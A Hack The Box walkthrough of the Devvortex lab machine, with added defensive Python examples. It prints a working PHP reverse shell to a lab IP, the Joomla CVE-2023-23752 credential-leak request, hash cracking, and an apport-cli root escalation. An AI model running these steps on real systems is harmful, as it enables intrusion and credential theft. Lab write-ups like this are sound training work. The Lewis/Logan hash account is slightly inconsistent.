
# HTB - Devvortex

<figure><img src="/files/kAi96GB0Yo2xZBHr9UhJ" alt=""><figcaption></figcaption></figure>

## Enumeration Phase:

### Nmap scan

First off, I started my enumeration with an Nmap scan of **`10.10.11.242`**. The options I regularly use are **`-sC`**, which is equivalent to **`--script=default`** and runs a collection of Nmap enumeration scripts against the target, and **`-sV`**, which does a service scan.

```
nmap -sC -sV 10.10.11.242
```

<figure><img src="/files/AdropfggfW0Hy5vBS4Sm" alt=""><figcaption></figcaption></figure>

I added **`devvortex.htb`** to `/etc/hosts` next to the IP of the box, which is **`10.10.11.242`**.

Since I still didn't have a way in, the next place to enumerate was **HTTP** on port **80**, so I navigated to **`http://devvortex.htb`**.

<figure><img src="/files/f5lvzYUSceqUPZrGfv3w" alt=""><figcaption></figcaption></figure>

### Brute-force hidden directories: <a href="#ee16" id="ee16"></a>

After visiting **`http://devvortex.htb`**, I decided to brute-force hidden directories with Gobuster and didn't find anything :cry:

```
gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200
```

### Subdomain enumeration: <a href="#ee16" id="ee16"></a>

I also used Gobuster for subdomain enumeration on this host and found **dev.devvortex.htb**.

```
gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```

<figure><img src="/files/oJ385MBrYQrTuMQpWwUO" alt=""><figcaption></figcaption></figure>

I added **`dev.devvortex.htb`** to `/etc/hosts` next to the IP of the box, which is **`10.10.11.242`**.

I then visited **`http://dev.devvortex.htb`**.

<figure><img src="/files/8r5INcQiReUHMrT41QSk" alt=""><figcaption></figcaption></figure>

### Brute-force hidden directories: <a href="#ee16" id="ee16"></a>

I decided to brute-force hidden directories with Dirsearch and found **/administrator/** and **/Readme.txt** :tada:

```
dirsearch -u dev.devvortex.htb
```

<figure><img src="/files/BBj6yGiMilgjaIDjhuFv" alt=""><figcaption></figcaption></figure>

On the **Administrator** page, I found out that it is the login page of Joomla CMS.

<figure><img src="/files/wdINwbuit4kDwPo5IjkM" alt=""><figcaption></figcaption></figure>

On the **Readme.txt** page, I found out the version of **Joomla CMS 4.2**.

<figure><img src="/files/WItvdrXi6F340zWfEXhG" alt=""><figcaption></figcaption></figure>

### Initial Foothold: <a href="#id-5880" id="id-5880"></a>

I found out that **Joomla CMS 4.2** is vulnerable to **CVE-2023-23752** and used the tool **Curl** to get some sensitive information, including the **username** and **password** of user **Lewis**.\
More about **CVE-2023-23752** at this link: <https://nvd.nist.gov/vuln/detail/CVE-2023-23752>

```
curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'
```

<figure><img src="/files/AyPx7FVFqHy7KoEsvmWy" alt=""><figcaption></figcaption></figure>
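Seen from the server side, the request above leaves a recognisable trace in the web access log. The following added example (not part of the original writeup) flags requests to Joomla API routes that carry a `public` query parameter; the combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def find_public_api_probes(lines):
    """Return one finding per request to an /api/ route carrying `public`."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        url = urlsplit(m["target"])
        # parse_qs percent-decodes keys, so `%70ublic=true` is caught too.
        params = parse_qs(url.query, keep_blank_values=True)
        path = unquote(url.path)
        if not path.startswith("/api/") or "public" not in params:
            continue
        findings.append({
            "ip": m["ip"],
            "time": m["time"],
            "path": path,
            # A 200 means the server answered the unauthenticated request:
            # treat every secret in the returned configuration as exposed.
            "disclosed": m["status"] == "200",
        })
    return findings


# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1987 "-" "curl/8.0"',
    '198.51.100.9 - - [01/Jan/2024:10:05:00 +0000] "GET /api/index.php/v1/users?%70ublic=true HTTP/1.1" 401 120 "-" "-"',
    '198.51.100.9 - - [01/Jan/2024:10:06:00 +0000] "GET /api/index.php/v1/content/articles HTTP/1.1" 401 98 "-" "-"',
    '192.0.2.44 - - [01/Jan/2024:10:07:00 +0000] "GET /index.php?public=true HTTP/1.1" 200 5120 "-" "-"',
    'unparseable line',
]

if __name__ == "__main__":
    for hit in find_public_api_probes(SAMPLE):
        print(hit)
```

A finding with `disclosed` set means the database credentials in the Joomla configuration should be rotated, since this writeup shows them being reused for MySQL access.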

After logging in to the **Administrator** page with the credentials that I found with Curl, I edited **error.php**, which was located at **/template/Cassiopeia/error.php**, and set up a reverse shell script.

```
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>
```

<figure><img src="/files/mbHRcAtWQIFTvEpj7fC4" alt=""><figcaption></figcaption></figure>

I ran **Netcat** to listen for incoming connections and used **Curl** to trigger a **reverse shell** at the **error.php** page.

```
nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php
```

<figure><img src="/files/egBNYXeYZfYe1kmF1tpB" alt=""><figcaption></figcaption></figure>

**Boom!** I got the **shell** as **www-data**.

<figure><img src="/files/muM8GmHAmxPvCKR2sxoB" alt=""><figcaption></figcaption></figure>
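The template edit used for this foothold is the kind of change a file-integrity check on the web root catches. The following added example (not part of the original writeup) records SHA-256 hashes of template PHP files, then reports files that changed and files that directly call a command-execution function; the function names, the pattern list and the demo tree are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Direct calls to PHP command-execution functions. The lookbehind skips method
# calls and names such as curl_exec(). The function list is an assumption.
EXEC_CALL = re.compile(
    rb"(?<![\w>:$])(exec|system|shell_exec|passthru|popen|proc_open)\s*\("
)


def build_baseline(root):
    """Map each PHP file under root (relative path) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*.php"))
    }


def audit_templates(root, baseline):
    """Compare the live tree with the baseline and flag exec-style calls."""
    root = Path(root)
    report = {"modified": [], "added": [], "removed": [], "exec_calls": []}
    live = build_baseline(root)
    for rel, digest in live.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
        if EXEC_CALL.search((root / rel).read_bytes()):
            report["exec_calls"].append(rel)
    report["removed"] = sorted(set(baseline) - set(live))
    return report


def demo():
    """Constructed tree: record a baseline, then change error.php."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = Path(tmp) / "templates" / "cassiopeia"
        tpl.mkdir(parents=True)
        (tpl / "index.php").write_text("<?php echo $this->title; ?>\n")
        (tpl / "error.php").write_text("<?php echo 'Page not found'; ?>\n")
        baseline = build_baseline(tmp)
        # Constructed stand-in for a command-execution edit to the template.
        (tpl / "error.php").write_text('<?php exec("id"); ?>\n')
        (tpl / "new.php").write_text("<?php curl_exec($ch); ?>\n")
        return audit_templates(tmp, baseline)
```

Store the baseline somewhere the web server account cannot write, otherwise whoever edits the template can also refresh the hashes.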

### Owning User: <a href="#id-7154" id="id-7154"></a>

The **credentials** that I found with **Curl** also included a **database name**, so I went on to check MySQL.

```
mysql -u lewis -p
show databases;
use joomla
show tables;
```

<figure><img src="/files/jf7ZHQN3cLQDyosPe7tF" alt=""><figcaption></figcaption></figure>

```
select * from sd4fg_users;
```

<figure><img src="/files/Rd9bbzDl5wUrEZYF7N1t" alt=""><figcaption></figcaption></figure>

Bingo :tada: I found the **hash** of **Lewis** and saved the hash locally in a .txt file.

```
echo 'HASH' >> hash.txt
```

I cracked the hash of **Logan** using the tool **John the Ripper**.

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt
```

<figure><img src="/files/sd7TwhZZfhlOVsJuF7BP" alt=""><figcaption></figcaption></figure>

Sweet!!! I logged in as the user **Logan** via **SSH**.

```
ssh logan@devvortex.htb
```

<figure><img src="/files/NFL4LYPjtrrmlGCJkthR" alt=""><figcaption></figcaption></figure>

### Owning Root: <a href="#a6ef" id="a6ef"></a>

The **sudo -l** command gave me some interesting output.

```
sudo -l
```

<figure><img src="/files/t8dBGrPLrPPjFLzVMrTv" alt=""><figcaption></figcaption></figure>

I found out that **apport-cli** is vulnerable to **CVE-2023-1326**.\
More about **CVE-2023-1326** at this link: [**https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023**](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023)

```
sudo apport-cli -c /bin/mysql less
v
!
id
```

<figure><img src="/files/ZgWVZwl74DfnyRdsbaU2" alt=""><figcaption></figcaption></figure>

